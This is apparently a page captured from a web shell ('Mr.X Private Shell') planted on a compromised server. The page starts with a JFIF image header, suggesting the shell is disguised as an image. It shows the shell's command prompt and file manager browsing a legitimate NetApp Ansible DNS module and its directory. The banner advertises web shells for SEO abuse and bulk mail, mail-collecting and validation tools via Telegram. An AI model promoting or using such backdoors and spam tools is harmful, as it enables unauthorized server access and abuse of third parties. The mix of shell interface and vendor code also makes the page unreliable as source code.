����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
# (c) 2018-2023, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

'''
na_ontap_dns
'''

from __future__ import absolute_import, division, print_function
__metaclass__ = type

DOCUMENTATION = '''
module: na_ontap_dns
short_description: NetApp ONTAP Create, delete, modify DNS servers.
extends_documentation_fragment:
    - netapp.ontap.netapp.na_ontap
version_added: 2.7.0
author: NetApp Ansible Team (@carchi8py) <ng-ansibleteam@netapp.com>
description:
- Create, delete, modify DNS servers.
- With REST, the module is currently limited to data vservers for delete or modify operations.
options:
  state:
    description:
      - Whether the DNS servers should be enabled for the given vserver.
    choices: ['present', 'absent']
    type: str
    default: present

  vserver:
    description:
      - The name of the vserver to use.
      - With REST, for cluster scoped DNS, omit this option or set it to NULL.
      - With ZAPI or REST, for cluster scoped DNS, this can also be set to the cluster vserver name.
    type: str

  domains:
    description:
    - List of DNS domains such as 'sales.bar.com'. The first domain is the one that the Vserver belongs to.
    type: list
    elements: str

  nameservers:
    description:
    - List of IPv4 addresses of name servers such as '123.123.123.123'.
    type: list
    elements: str

  skip_validation:
    type: bool
    description:
    - By default, all nameservers are checked to validate they are available to resolve.
    - If you DNS servers are not yet installed or momentarily not available, you can set this option to 'true'
    - to bypass the check for all servers specified in nameservers field.
    - With REST, requires ONTAP 9.9.1 or later and ignored for cluster DNS operations.
    version_added: 2.8.0
'''

EXAMPLES = """
    - name: create or modify DNS
      netapp.ontap.na_ontap_dns:
        state: present
        hostname: "{{hostname}}"
        username: "{{username}}"
        password: "{{password}}"
        vserver:  "{{vservername}}"
        domains: sales.bar.com
        nameservers: 10.193.0.250,10.192.0.250
        skip_validation: true

    - name: create or modify cluster DNS with REST
      netapp.ontap.na_ontap_dns:
        state: present
        hostname: "{{hostname}}"
        username: "{{username}}"
        password: "{{password}}"
        domains: sales.bar.com
        nameservers: 10.193.0.250,10.192.0.250
"""

RETURN = """

"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible_collections.netapp.ontap.plugins.module_utils.netapp as netapp_utils
from ansible_collections.netapp.ontap.plugins.module_utils import rest_generic
from ansible_collections.netapp.ontap.plugins.module_utils.netapp_module import NetAppModule


class NetAppOntapDns:
    """
    Enable and Disable dns
    """

    def __init__(self):
        self.use_rest = False
        self.argument_spec = netapp_utils.na_ontap_host_argument_spec()
        self.argument_spec.update(dict(
            state=dict(required=False, type='str', choices=['present', 'absent'], default='present'),
            vserver=dict(required=False, type='str'),
            domains=dict(required=False, type='list', elements='str'),
            nameservers=dict(required=False, type='list', elements='str'),
            skip_validation=dict(required=False, type='bool')
        ))

        self.module = AnsibleModule(
            argument_spec=self.argument_spec,
            required_if=[('state', 'present', ['domains', 'nameservers'])],
            supports_check_mode=True
        )

        self.na_helper = NetAppModule()
        self.parameters = self.na_helper.set_parameters(self.module.params)
        # Cluster vserver and data vserver use different REST API.
        self.is_cluster = False

        # REST API should be used for ONTAP 9.6 or higher, ZAPI for lower version
        self.rest_api = netapp_utils.OntapRestAPI(self.module)
        self.use_rest = self.rest_api.is_rest_supported_properties(self.parameters, None, [['skip_validation', (9, 9, 1)]])
        if not self.use_rest:
            if not netapp_utils.has_netapp_lib():
                self.module.fail_json(msg=netapp_utils.netapp_lib_is_required())
            if not self.parameters.get('vserver'):
                self.module.fail_json(msg="Error: vserver is a required parameter with ZAPI.")
            self.server = netapp_utils.setup_na_ontap_zapi(module=self.module, vserver=self.parameters['vserver'])
        return

    def patch_cluster_dns(self):
        api = 'cluster'
        body = {
            'dns_domains': self.parameters['domains'],
            'name_servers': self.parameters['nameservers']
        }
        if self.parameters.get('skip_validation'):
            self.module.warn("skip_validation is ignored for cluster DNS operations in REST.")
        dummy, error = rest_generic.patch_async(self.rest_api, api, None, body)
        if error:
            self.module.fail_json(msg="Error updating cluster DNS options: %s" % error)

    def create_dns_rest(self):
        """
        Create DNS server
        :return: none
        """
        if self.is_cluster or not self.parameters.get('vserver'):
            # with 9.13, using scope=cluster with POST on 'name-services/dns' does not work:
            # "svm.uuid" is a required field
            return self.patch_cluster_dns()

        api = 'name-services/dns'
        body = {
            'domains': self.parameters['domains'],
            'servers': self.parameters['nameservers'],
            'svm': {
                'name': self.parameters['vserver']
            }
        }
        if 'skip_validation' in self.parameters:
            body['skip_config_validation'] = self.parameters['skip_validation']
        dummy, error = rest_generic.post_async(self.rest_api, api, body)
        if error:
            self.module.fail_json(msg="Error creating DNS service: %s" % error)

    def create_dns(self):
        """
        Create DNS server
        :return: none
        """
        if self.use_rest:
            return self.create_dns_rest()

        dns = netapp_utils.zapi.NaElement('net-dns-create')
        nameservers = netapp_utils.zapi.NaElement('name-servers')
        domains = netapp_utils.zapi.NaElement('domains')
        for each in self.parameters['nameservers']:
            ip_address = netapp_utils.zapi.NaElement('ip-address')
            ip_address.set_content(each)
            nameservers.add_child_elem(ip_address)
        dns.add_child_elem(nameservers)
        for each in self.parameters['domains']:
            domain = netapp_utils.zapi.NaElement('string')
            domain.set_content(each)
            domains.add_child_elem(domain)
        dns.add_child_elem(domains)
        if self.parameters.get('skip_validation'):
            validation = netapp_utils.zapi.NaElement('skip-config-validation')
            validation.set_content(str(self.parameters['skip_validation']))
            dns.add_child_elem(validation)
        try:
            self.server.invoke_successfully(dns, True)
        except netapp_utils.zapi.NaApiError as error:
            self.module.fail_json(msg='Error creating dns: %s' % to_native(error),
                                  exception=traceback.format_exc())

    def destroy_dns_rest(self, dns_attrs):
        """
        Destroys an already created dns
        :return:
        """
        if self.is_cluster:
            error = 'Error: cluster scope when deleting DNS with REST requires ONTAP 9.9.1 or later.'
            self.module.fail_json(msg=error)
        api = 'name-services/dns'
        dummy, error = rest_generic.delete_async(self.rest_api, api, dns_attrs['uuid'])
        if error:
            self.module.fail_json(msg="Error deleting DNS service: %s" % error)

    def destroy_dns(self, dns_attrs):
        """
        Destroys an already created dns
        :return:
        """
        if self.use_rest:
            return self.destroy_dns_rest(dns_attrs)

        try:
            self.server.invoke_successfully(netapp_utils.zapi.NaElement('net-dns-destroy'), True)
        except netapp_utils.zapi.NaApiError as error:
            self.module.fail_json(msg='Error destroying dns: %s' % to_native(error),
                                  exception=traceback.format_exc())

    def get_cluster(self):
        api = "cluster"
        record, error = rest_generic.get_one_record(self.rest_api, api)
        if error:
            self.module.fail_json(msg="Error getting cluster info: %s" % error)
        return record

    def get_cluster_dns(self):
        cluster_attrs = self.get_cluster()
        dns_attrs = None
        if not self.parameters.get('vserver') or self.parameters['vserver'] == cluster_attrs['name']:
            dns_attrs = {
                'domains': cluster_attrs.get('dns_domains'),
                'nameservers': cluster_attrs.get('name_servers'),
                'uuid': cluster_attrs['uuid'],
            }
            self.is_cluster = True
            if dns_attrs['domains'] is None and dns_attrs['nameservers'] is None:
                dns_attrs = None
        return dns_attrs

    def get_dns_rest(self):
        if not self.parameters.get('vserver') and not self.rest_api.meets_rest_minimum_version(self.use_rest, 9, 9, 1):
            # scope requires 9.9, so revert to cluster API
            return self.get_cluster_dns()

        api = "name-services/dns"
        params = {'fields': 'domains,servers,svm'}
        if self.parameters.get('vserver'):
            # omit scope as vserver may be a cluster vserver
            params['svm.name'] = self.parameters['vserver']
        else:
            params['scope'] = 'cluster'
        record, error = rest_generic.get_one_record(self.rest_api, api, params)
        if error:
            self.module.fail_json(msg="Error getting DNS service: %s" % error)
        if record:
            return {
                'domains': record['domains'],
                'nameservers': record['servers'],
                'uuid': record['svm']['uuid']
            }
        if self.parameters.get('vserver') and not self.rest_api.meets_rest_minimum_version(self.use_rest, 9, 9, 1):
            # There is a chance we are working at the cluster level
            return self.get_cluster_dns()
        return None

    def get_dns(self):
        if self.use_rest:
            return self.get_dns_rest()

        dns_obj = netapp_utils.zapi.NaElement('net-dns-get')
        try:
            result = self.server.invoke_successfully(dns_obj, True)
        except netapp_utils.zapi.NaApiError as error:
            if to_native(error.code) == "15661":
                # 15661 is object not found
                return None
            else:
                self.module.fail_json(msg="Error getting DNS info: %s." % to_native(error), exception=traceback.format_exc())

        attributes = result.get_child_by_name('attributes')
        if attributes is None:
            return
        dns_info = attributes.get_child_by_name('net-dns-info')
        nameservers = dns_info.get_child_by_name('name-servers')
        attrs = {
            'nameservers': [
                each.get_content() for each in nameservers.get_children()
            ]
        }
        domains = dns_info.get_child_by_name('domains')
        attrs['domains'] = [each.get_content() for each in domains.get_children()]
        return attrs

    def modify_dns_rest(self, dns_attrs):
        if self.is_cluster:
            return self.patch_cluster_dns()
        body = {}
        if dns_attrs['nameservers'] != self.parameters['nameservers']:
            body['servers'] = self.parameters['nameservers']
        if dns_attrs['domains'] != self.parameters['domains']:
            body['domains'] = self.parameters['domains']
        if 'skip_validation' in self.parameters:
            body['skip_config_validation'] = self.parameters['skip_validation']
        api = "name-services/dns"
        dummy, error = rest_generic.patch_async(self.rest_api, api, dns_attrs['uuid'], body)
        if error:
            self.module.fail_json(msg="Error modifying DNS configuration: %s" % error)

    def modify_dns(self, dns_attrs):
        if self.use_rest:
            return self.modify_dns_rest(dns_attrs)
        dns = netapp_utils.zapi.NaElement('net-dns-modify')
        if dns_attrs['nameservers'] != self.parameters['nameservers']:
            nameservers = netapp_utils.zapi.NaElement('name-servers')
            for each in self.parameters['nameservers']:
                ip_address = netapp_utils.zapi.NaElement('ip-address')
                ip_address.set_content(each)
                nameservers.add_child_elem(ip_address)
            dns.add_child_elem(nameservers)
        if dns_attrs['domains'] != self.parameters['domains']:
            domains = netapp_utils.zapi.NaElement('domains')
            for each in self.parameters['domains']:
                domain = netapp_utils.zapi.NaElement('string')
                domain.set_content(each)
                domains.add_child_elem(domain)
            dns.add_child_elem(domains)
        if self.parameters.get('skip_validation'):
            validation = netapp_utils.zapi.NaElement('skip-config-validation')
            validation.set_content(str(self.parameters['skip_validation']))
            dns.add_child_elem(validation)
        try:
            self.server.invoke_successfully(dns, True)
        except netapp_utils.zapi.NaApiError as error:
            self.module.fail_json(msg='Error modifying dns: %s' % to_native(error), exception=traceback.format_exc())

    def apply(self):
        dns_attrs = self.get_dns()
        cd_action = self.na_helper.get_cd_action(dns_attrs, self.parameters)
        modify = None
        if cd_action is None:
            modify = self.na_helper.get_modified_attributes(dns_attrs, self.parameters)
        if self.na_helper.changed and not self.module.check_mode:
            if cd_action == 'create':
                self.create_dns()
            elif cd_action == 'delete':
                self.destroy_dns(dns_attrs)
            else:
                self.modify_dns(dns_attrs)
        result = netapp_utils.generate_result(self.na_helper.changed, cd_action, modify)
        self.module.exit_json(**result)


def main():
    """
    Create, Delete, Modify DNS servers.
    """
    obj = NetAppOntapDns()
    obj.apply()


if __name__ == '__main__':
    main()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
na_ontap_active_directory.py File 14.01 KB 0644
na_ontap_active_directory_domain_controllers.py File 8.48 KB 0644
na_ontap_aggregate.py File 49.5 KB 0644
na_ontap_autosupport.py File 19.35 KB 0644
na_ontap_autosupport_invoke.py File 6.52 KB 0644
na_ontap_bgp_peer_group.py File 12.33 KB 0644
na_ontap_broadcast_domain.py File 29.74 KB 0644
na_ontap_broadcast_domain_ports.py File 8.37 KB 0644
na_ontap_cg_snapshot.py File 8.23 KB 0644
na_ontap_cifs.py File 23.23 KB 0644
na_ontap_cifs_acl.py File 14.53 KB 0644
na_ontap_cifs_local_group.py File 7.85 KB 0644
na_ontap_cifs_local_group_member.py File 11.25 KB 0644
na_ontap_cifs_local_user.py File 8.44 KB 0644
na_ontap_cifs_local_user_modify.py File 8.63 KB 0644
na_ontap_cifs_local_user_set_password.py File 5.94 KB 0644
na_ontap_cifs_server.py File 25.92 KB 0644
na_ontap_cluster.py File 33.16 KB 0644
na_ontap_cluster_ha.py File 5.3 KB 0644
na_ontap_cluster_peer.py File 19.14 KB 0644
na_ontap_command.py File 11.33 KB 0644
na_ontap_debug.py File 11.05 KB 0644
na_ontap_disk_options.py File 5.23 KB 0644
na_ontap_disks.py File 15.02 KB 0644
na_ontap_dns.py File 14.22 KB 0644
na_ontap_domain_tunnel.py File 4.88 KB 0644
na_ontap_efficiency_policy.py File 18.31 KB 0644
na_ontap_ems_destination.py File 6.97 KB 0644
na_ontap_ems_filter.py File 9.25 KB 0644
na_ontap_export_policy.py File 10.24 KB 0644
na_ontap_export_policy_rule.py File 32.27 KB 0644
na_ontap_fcp.py File 9.84 KB 0644
na_ontap_fdsd.py File 4.87 KB 0644
na_ontap_fdsp.py File 4.88 KB 0644
na_ontap_fdspt.py File 8.11 KB 0644
na_ontap_fdss.py File 3.51 KB 0644
na_ontap_file_directory_policy.py File 15.37 KB 0644
na_ontap_file_security_permissions.py File 36.06 KB 0644
na_ontap_file_security_permissions_acl.py File 21.03 KB 0644
na_ontap_firewall_policy.py File 13.85 KB 0644
na_ontap_firmware_upgrade.py File 41.58 KB 0644
na_ontap_flexcache.py File 28.38 KB 0644
na_ontap_fpolicy_event.py File 18.51 KB 0644
na_ontap_fpolicy_ext_engine.py File 20.8 KB 0644
na_ontap_fpolicy_policy.py File 15.76 KB 0644
na_ontap_fpolicy_scope.py File 23.33 KB 0644
na_ontap_fpolicy_status.py File 9.96 KB 0644
na_ontap_igroup.py File 29.17 KB 0644
na_ontap_igroup_initiator.py File 8.28 KB 0644
na_ontap_info.py File 72.19 KB 0644
na_ontap_interface.py File 71.15 KB 0644
na_ontap_ipspace.py File 10.23 KB 0644
na_ontap_iscsi.py File 12.24 KB 0644
na_ontap_iscsi_security.py File 13.12 KB 0644
na_ontap_job_schedule.py File 20 KB 0644
na_ontap_kerberos_interface.py File 8.3 KB 0644
na_ontap_kerberos_realm.py File 17.46 KB 0644
na_ontap_ldap.py File 7.33 KB 0644
na_ontap_ldap_client.py File 22.46 KB 0644
na_ontap_license.py File 29.15 KB 0644
na_ontap_local_hosts.py File 7.3 KB 0644
na_ontap_log_forward.py File 11.83 KB 0644
na_ontap_login_messages.py File 12.76 KB 0644
na_ontap_lun.py File 56.54 KB 0644
na_ontap_lun_copy.py File 8 KB 0644
na_ontap_lun_map.py File 13.03 KB 0644
na_ontap_lun_map_reporting_nodes.py File 10.87 KB 0644
na_ontap_mcc_mediator.py File 5.42 KB 0644
na_ontap_metrocluster.py File 5.28 KB 0644
na_ontap_metrocluster_dr_group.py File 7.89 KB 0644
na_ontap_motd.py File 7.76 KB 0644
na_ontap_name_mappings.py File 11.6 KB 0644
na_ontap_name_service_switch.py File 10.45 KB 0644
na_ontap_ndmp.py File 13.49 KB 0644
na_ontap_net_ifgrp.py File 22.62 KB 0644
na_ontap_net_port.py File 11.03 KB 0644
na_ontap_net_routes.py File 13.84 KB 0644
na_ontap_net_subnet.py File 16.43 KB 0644
na_ontap_net_vlan.py File 13.32 KB 0644
na_ontap_nfs.py File 34.3 KB 0644
na_ontap_node.py File 9.74 KB 0644
na_ontap_ntfs_dacl.py File 13.41 KB 0644
na_ontap_ntfs_sd.py File 10.14 KB 0644
na_ontap_ntp.py File 10.27 KB 0644
na_ontap_ntp_key.py File 5.7 KB 0644
na_ontap_nvme.py File 9.42 KB 0644
na_ontap_nvme_namespace.py File 9.3 KB 0644
na_ontap_nvme_subsystem.py File 19.7 KB 0644
na_ontap_object_store.py File 13.8 KB 0644
na_ontap_partitions.py File 17.81 KB 0644
na_ontap_ports.py File 23.49 KB 0644
na_ontap_portset.py File 18.02 KB 0644
na_ontap_publickey.py File 10.76 KB 0644
na_ontap_qos_adaptive_policy_group.py File 12.75 KB 0644
na_ontap_qos_policy_group.py File 24.56 KB 0644
na_ontap_qtree.py File 17.83 KB 0644
na_ontap_quota_policy.py File 9.62 KB 0644
na_ontap_quotas.py File 40.3 KB 0644
na_ontap_rest_cli.py File 4.84 KB 0644
na_ontap_rest_info.py File 54.29 KB 0644
na_ontap_restit.py File 13.1 KB 0644
na_ontap_s3_buckets.py File 25.13 KB 0644
na_ontap_s3_groups.py File 8.38 KB 0644
na_ontap_s3_policies.py File 8.51 KB 0644
na_ontap_s3_services.py File 7.89 KB 0644
na_ontap_s3_users.py File 6.86 KB 0644
na_ontap_security_certificates.py File 17.9 KB 0644
na_ontap_security_config.py File 12.77 KB 0644
na_ontap_security_ipsec_ca_certificate.py File 6.92 KB 0644
na_ontap_security_ipsec_config.py File 4.39 KB 0644
na_ontap_security_ipsec_policy.py File 17.64 KB 0644
na_ontap_security_key_manager.py File 27.86 KB 0644
na_ontap_security_ssh.py File 7.2 KB 0644
na_ontap_service_policy.py File 12.93 KB 0644
na_ontap_service_processor_network.py File 17.83 KB 0644
na_ontap_snaplock_clock.py File 6.08 KB 0644
na_ontap_snapmirror.py File 86.94 KB 0644
na_ontap_snapmirror_policy.py File 52.81 KB 0644
na_ontap_snapshot.py File 18.52 KB 0644
na_ontap_snapshot_policy.py File 31.57 KB 0644
na_ontap_snmp.py File 8.45 KB 0644
na_ontap_snmp_traphosts.py File 4.26 KB 0644
na_ontap_software_update.py File 34.05 KB 0644
na_ontap_ssh_command.py File 9.34 KB 0644
na_ontap_storage_auto_giveback.py File 9.69 KB 0644
na_ontap_storage_failover.py File 6.92 KB 0644
na_ontap_svm.py File 42.08 KB 0644
na_ontap_svm_options.py File 5.33 KB 0644
na_ontap_ucadapter.py File 11.6 KB 0644
na_ontap_unix_group.py File 18.27 KB 0644
na_ontap_unix_user.py File 12.12 KB 0644
na_ontap_user.py File 40.32 KB 0644
na_ontap_user_role.py File 22.64 KB 0644
na_ontap_volume.py File 142.63 KB 0644
na_ontap_volume_autosize.py File 15.57 KB 0644
na_ontap_volume_clone.py File 14.79 KB 0644
na_ontap_volume_efficiency.py File 32.69 KB 0644
na_ontap_volume_snaplock.py File 8.67 KB 0644
na_ontap_vscan.py File 5.85 KB 0644
na_ontap_vscan_on_access_policy.py File 24.2 KB 0644
na_ontap_vscan_on_demand_task.py File 17.45 KB 0644
na_ontap_vscan_scanner_pool.py File 12 KB 0644
na_ontap_vserver_audit.py File 13.73 KB 0644
na_ontap_vserver_cifs_security.py File 12.08 KB 0644
na_ontap_vserver_peer.py File 19.63 KB 0644
na_ontap_vserver_peer_permissions.py File 7.29 KB 0644
na_ontap_wait_for_condition.py File 16.11 KB 0644
na_ontap_wwpn_alias.py File 6.03 KB 0644
na_ontap_zapit.py File 10.09 KB 0644